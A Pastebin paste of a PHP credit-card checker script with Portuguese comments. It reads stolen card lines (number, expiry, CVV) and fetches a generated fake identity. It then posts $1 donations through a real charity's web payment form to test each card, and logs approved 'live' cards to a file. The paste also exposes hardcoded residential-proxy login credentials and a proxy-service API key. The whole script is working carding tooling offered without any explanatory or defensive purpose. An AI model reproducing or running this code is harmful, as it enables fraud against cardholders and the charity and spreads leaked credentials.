Advertisement
Guest User

Untitled

a guest
Mar 21st, 2019
518
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.37 KB | None | 0 0
  1. <?php
  2. set_time_limit(0);
  3. error_reporting(0);
  4.  
  5. function inStr($string, $start, $end, $value) {
  6. $str = explode($start, $string);
  7. $str = explode($end, $str[$value]);
  8. return $str[0];
  9. }
  10.  
  11. function getStr($string, $start, $end) {
  12. $str = explode($start, $string);
  13. $str = explode($end, $str[1]);
  14. return $str[0];
  15. }
  16.  
  17. function soNumero($str) {
  18. return preg_replace("/[^0-9]/", "", $str);
  19. }
  20.  
  21. function gerasenha($length = 96) {
  22. $characters = 'n474p72709oo8o15n65n80q5nsor1r986Sh3hkGJ4w4sI0u6Ej5ZVlAGksRrvfJdw6mB5OZKazk0OCWBCYUtKRPDbvD2erdl';
  23. $charactersLength = strlen($characters);
  24. $randomString = '';
  25. for ($i = 0; $i < $length; $i++) {
  26. $randomString .= $characters[rand(0, $charactersLength - 1)];
  27. }
  28. return $randomString;
  29. }
  30.  
  31. $gerasenha1 = gerasenha();
  32.  
  33.  
  34. if ($_SERVER['REQUEST_METHOD'] == 'POST') {
  35. extract($_POST);
  36. } elseif ($_SERVER['REQUEST_METHOD'] == 'GET') {
  37. extract($_GET);
  38. }
  39.  
  40.  
  41. ////////////////////////////////////////////////////////////////////////////////
  42. $lista = str_replace(" ", "", $lista);
  43. $separador = explode("|", $lista);
  44. $cc = $separador[0];
  45. $final = substr($cc, 12, 4);
  46. $mes = $separador[1];
  47. $ano = $separador[2];
  48. $cvv = $separador[3];
  49. $bin = substr($cc, 0, 1);
  50. /////////////////////////////////////////////////////////////////////////
  51. $ckfile = getcwd() . "/cookie_" . rand(11111, 99999) . ".txt";
  52. if (file_exists($ckfile))
  53. unlink($ckfile);
  54. /* deletar cookies */
  55. $lis = scandir(getcwd());
  56. foreach ($lis as $v) {
  57. if (strpos($v, 'cookie_') !== false) {
  58. if (file_exists($v))
  59. unlink($v);
  60. }
  61. }
  62.  
  63. /////////////////////////////////////////////////////////////////////////
  64.  
  65. switch (true) {
  66. case ($bin = '6'):
  67. $bandeira1 = 'discover';
  68. case ($bin = '5'):
  69. $bandeira1 = 'Mastercard';
  70. break;
  71. case ($bin = '4'):
  72. $bandeira1 = 'Visa';
  73. break;
  74. case ($bin = '3'):
  75. $bandeira1 = 'American Express';
  76. break;
  77. }
  78.  
  79. /*switch ($mes) {
  80. case '01': $mes = '1';
  81. break;
  82. case '02': $mes = '2';
  83. break;
  84. case '03': $mes = '3';
  85. break;
  86. case '04': $mes = '4';
  87. break;
  88. case '05': $mes = '5';
  89. break;
  90. case '06': $mes = '6';
  91. break;
  92. case '07': $mes = '7';
  93. break;
  94. case '08': $mes = '8';
  95. break;
  96. case '09': $mes = '9';
  97. break;
  98. }*/
  99.  
  100. switch ($ano) {
  101. case '2017':
  102. $ano = '17';
  103. break;
  104. case '2018':
  105. $ano = '18';
  106. break;
  107. case '2019':
  108. $ano = '19';
  109. break;
  110. case '2020':
  111. $ano = '20';
  112. break;
  113. case '2021':
  114. $ano = '21';
  115. break;
  116. case '2022':
  117. $ano = '22';
  118. break;
  119. case '2023':
  120. $ano = '23';
  121. break;
  122. case '2024':
  123. $ano = '24';
  124. break;
  125. case '2025':
  126. $ano = '25';
  127. break;
  128. case '2026':
  129. $ano = '26';
  130. break;
  131. case '2027':
  132. $ano = '27';
  133. break;
  134. case '2028':
  135. $ano = '28';
  136. break;
  137. }
  138.  
  139. /////////////////////////////////////////////////////////////////////////
  140.  
  141. /* Sistema de Random de nomes */
  142. $first = array("Joao", "Eduardo", "William", "Jonas", "Henrique", "Everton", "Rodrigo", "Pedro", "Daniel", "Paulo", "Guilherme", "Mateus", "Maria", "Bianca", "Julia", "Marcos");
  143. $surname = array("Souza", "Marques", "Jose", "Nicolau", "Soares", "Silva", "Nogueira");
  144.  
  145. $nome = $first[array_rand($first)];
  146. $sobrenome = $surname[array_rand($surname)];
  147. /* Sistema de Random de nomes */
  148.  
  149. /* Sistema de Random de Email */
  150. $base = array();
  151. $letras = str_shuffle("ABCDEFGHIJKLMNOPQRSTUV");
  152. $provedores = array("@GMAIL.COM", "@HOTMAIL.COM", "@TERRA.COM", "@OUTLOOK.COM", "@UOL.COM.BR", "@BOL.COM.BR", "@IG.COM.BR");
  153. # Inicio da base
  154. $base[1] = mt_rand(0, 999999);
  155. $base[2] = substr($nome, 0, 9);
  156. $base[3] = $provedores[array_rand($provedores)];
  157. #----------------------------
  158. $email = implode(null, $base);
  159.  
  160. $ch = curl_init();
  161. $username = 'lum-customer-hl_d787f7bc-zone-static';
  162. $password = '3o26lcebh9cr';
  163. $port = 22225;
  164. $session = mt_rand();
  165. $super_proxy = 'zproxy.lum-superproxy.io';
  166.  
  167. curl_setopt($ch, CURLOPT_URL, "https://www.4devs.com.br/ferramentas_online.php");
  168. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  169. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  170. curl_setopt($ch, CURLOPT_COOKIE, getcwd() . "/cookie_" . rand(11111, 99999) . ".txt");
  171. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd() . "/cookie_" . rand(11111, 99999) . ".txt");
  172. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd() . "/cookie_" . rand(11111, 99999) . ".txt");
  173. curl_setopt($ch, CURLOPT_COOKIESESSION, getcwd() . "/cookie_" . rand(11111, 99999) . ".txt");
  174. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  175. curl_setopt($ch, CURLOPT_ENCODING, "gzip");
  176. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  177. curl_setopt($ch, CURLOPT_POST, true);
  178. curl_setopt($ch, CURLOPT_POSTFIELDS, 'acao=gerar_pessoa&sexo=H&idade=22&pontuacao=S&cep_estado=&cep_cidade=');
  179. $tep_0dados = curl_exec($ch);
  180. /////////////////////////////////
  181. //*//*#Decode//*////*//
  182. $tep_0dadoss = json_decode($tep_0dados, true);
  183. /////////////////////////////////
  184. //*//*#Decoda 4dev//*////*//
  185. $name = $tep_0dadoss["nome"];
  186. $cpf = $tep_0dadoss["cpf"];
  187. $cpflimpo = str_replace(array('.','-'), '', $cpf);
  188. $rg = $tep_0dadoss["rg"];
  189. $cep = $tep_0dadoss["cep"];
  190. $endereco = $tep_0dadoss["endereco"];
  191. $numero = $tep_0dadoss["numero"];
  192. $bairro = $tep_0dadoss["bairro"];
  193. $cidade = $tep_0dadoss["cidade"];
  194. $estado = $tep_0dadoss["estado"];
  195. $telefone_fixo = $tep_0dadoss["telefone_fixo"];
  196. $celular = $tep_0dadoss["celular"];
  197. /////////////////////////////////
  198. //*//*#Gerador Email e senha//*////*//
  199. $cpfsonumero = soNumero("".$cpf."");
  200. $cepsonumero = soNumero("".$cep."");
  201.  
  202. $link = file_get_contents("https://api.getproxylist.com/proxy?apiKey=2769d07972701a1cb65b10f9565e205f3fcd463a&protocol=http&lastTested=600&maxConnectTime=3");
  203. $link2 = json_decode($link);
  204. $link3 = $link2->ip;
  205. $link4 = $link2->port;
  206. $proxy = $link3.":".$link4;
  207.  
  208. $ch = curl_init();
  209. curl_setopt($ch, CURLOPT_URL, 'https://www.bethor.org/building-beautification-funds');
  210. curl_setopt($ch, CURLOPT_HEADER, 1);
  211. //curl_setopt($ch, CURLOPT_PROXY, "http://$super_proxy:$port");
  212. //curl_setopt($ch, CURLOPT_PROXYUSERPWD, "$username-session-$session:$password");
  213. curl_setopt($ch, CURLOPT_NOBODY, false);
  214. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  215. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  216. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  217. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  218. curl_setopt($ch, CURLOPT_HTTPHEADER, array(
  219. 'Host: www.bethor.org',
  220. 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36',
  221. 'referer: https://www.bethor.org/building-beautification-funds'
  222. ));
  223. curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
  224. curl_setopt($ch, CURLOPT_POSTFIELDS, 'submitted%5Bplease_select_from_the_following_funds%5D=capital&submitted%5Bdonation_amount%5D=0&submitted%5Bother_amount%5D=1&submitted%5Bthis_gift_is%5D=mazel&submitted%5Bother_purpose%5D=&submitted%5Bdonation_is_in_names_of%5D=&submitted%5Bsend_donation_notification_to%5D=&submitted%5Bfull_name%5D=LUCAS+MARQUES&submitted%5Be_mail_address%5D=dasdsa%40gmail.com&submitted%5Bphone_number%5D=2014549874&submitted%5Baddress%5D=37+E.+Victoria+ST&submitted%5Baddress_line_2%5D=&submitted%5Bcity%5D=Santa+Barbara&submitted%5Bstate%5D=CA&submitted%5Bzip_code%5D=93101&submitted%5Bis_this_an_anonymous_gift%5D=yes&details%5Bsid%5D=&details%5Bpage_num%5D=1&details%5Bpage_count%5D=2&details%5Bfinished%5D=0&form_build_id=form-'.$ccid.'&form_id=webform_client_form_240&op=Next+Page+%3E');
  225. curl_setopt($ch, CURLOPT_VERBOSE, 1);
  226. $a = curl_exec($ch);
  227.  
  228. $ccid = getstr($a, '<input type="hidden" name="form_build_id" value="form-','" />');
  229.  
  230. curl_setopt($ch, CURLOPT_URL, 'https://www.bethor.org/building-beautification-funds');
  231. curl_setopt($ch, CURLOPT_HEADER, 1);
  232. //curl_setopt($ch, CURLOPT_PROXY, "http://$super_proxy:$port");
  233. //curl_setopt($ch, CURLOPT_PROXYUSERPWD, "$username-session-$session:$password");
  234. curl_setopt($ch, CURLOPT_NOBODY, false);
  235. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  236. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  237. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  238. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  239. curl_setopt($ch, CURLOPT_COOKIE, getcwd() . "/cookie_" . rand(11111, 99999) . ".txt");
  240. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd() . "/cookie_" . rand(11111, 99999) . ".txt");
  241. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd() . "/cookie_" . rand(11111, 99999) . ".txt");
  242. curl_setopt($ch, CURLOPT_COOKIESESSION, getcwd() . "/cookie_" . rand(11111, 99999) . ".txt");
  243. curl_setopt($ch, CURLOPT_HTTPHEADER, array(
  244. 'Host: www.bethor.org',
  245. 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36',
  246. 'referer: https://www.bethor.org/building-beautification-funds'
  247. ));
  248. curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
  249. curl_setopt($ch, CURLOPT_POSTFIELDS, 'submitted%5Bpage_break%5D=Page+Break&submitted%5Btotal%5D=1&webform_pay%5Bpay_method%5D%5B2%5D%5Bfirst_name%5D=LUCAS&webform_pay%5Bpay_method%5D%5B2%5D%5Blast_name%5D=MARQUES&webform_pay%5Bpay_method%5D%5B2%5D%5Bcc_type%5D='.$bandeira1.'&webform_pay%5Bpay_method%5D%5B2%5D%5Bcc_number%5D='.$cc.'&webform_pay%5Bpay_method%5D%5B2%5D%5Bcc_ccv2%5D='.$cvv.'&webform_pay%5Bpay_method%5D%5B2%5D%5Bcc_exp_month%5D='.$mes.'&webform_pay%5Bpay_method%5D%5B2%5D%5Bcc_exp_year%5D='.$ano.'&details%5Bsid%5D=1462&details%5Bpage_num%5D=2&details%5Bpage_count%5D=2&details%5Bfinished%5D=&form_build_id=form-_2xwehex5xJB7WQlwtVDI8g-PbzsSRxHKoXupCXVGrs&form_id=webform_client_form_240&op=Submit');
  250. curl_setopt($ch, CURLOPT_VERBOSE, 1);
  251. $a1 = curl_exec($ch);
  252. /////////////////////////////////////////////////////////////////////////
  253. //There was a problem with your submission
  254.  
  255. if(strpos($a1, 'This transaction has been declined')){
  256. echo '<tr><th><font color=red class="label label-danger">Reprovada CVV INVALIDA</font></th>
  257. <th><font>'.$cc.'|'.$mes.'|'.$ano.'|'.$cvv.'</font></th></tr>';
  258.  
  259. } elseif(strpos($a1, 'Thank your for your donation')){
  260. echo '<tr><th><font class="label label-success">Aprovada CVV ENCONTRADO</font></th>
  261. <th><font>'.$cc . '|' . $mes.'|'.$ano.'|'.$cvv.'</font></th>
  262. <th><font class="label label-primary">GG</font></th></tr>';
  263. $tudof = $cc . '|' . $mes.'|'.$ano.'|'.$cvv."\r\n";
  264. echo "<br />";
  265. $fp = fopen("lives.txt", "a");
  266. fwrite($fp, $tudof);
  267. fclose($fp);
  268.  
  269. }
  270.  
  271.  
  272. else{
  273. echo '<tr><th><font color=red class="label label-danger">ERRO</font></th>
  274. <th><font>'.$cc.'|'.$mes.'|'.$ano.'|'.$cvv.'</font></th></tr>';
  275. }
  276.  
  277.  
  278.  
  279. flush();
  280. ob_flush();
  281. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement